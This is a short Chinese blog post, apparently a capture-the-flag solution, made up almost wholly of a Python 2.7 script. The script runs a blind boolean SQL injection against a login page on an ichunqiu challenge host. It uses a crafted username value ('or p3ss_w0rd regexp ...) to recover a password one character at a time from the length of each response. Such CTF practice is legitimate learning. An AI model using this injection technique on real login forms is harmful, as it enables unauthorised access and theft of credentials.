登陆

2019-06-12  本文已影响0人  Yix1a
# py2.7
import string
import requests


u =  'http://c6065149f0634125968c0ed3421e96e17e45f13aa4af4331.changame.ichunqiu.com/Challenges/login.php'
headers = {
    'Content-Type': 'application/x-www-form-urlencoded'
}

payloads = string.letters + string.digits

temp = ''

for i in xrange(32):
    for p in payloads:
        payload = temp + p
        data = "username=aa'or p3ss_w0rd regexp '^{}'%23&password=admin".format(payload)
        r = requests.post(u,headers=headers,data=data)
        if(len(r.text.encode('utf-8')) == 12):
                temp += p
                print temp.ljust(32,'.')
                break
上一篇 下一篇

猜你喜欢

热点阅读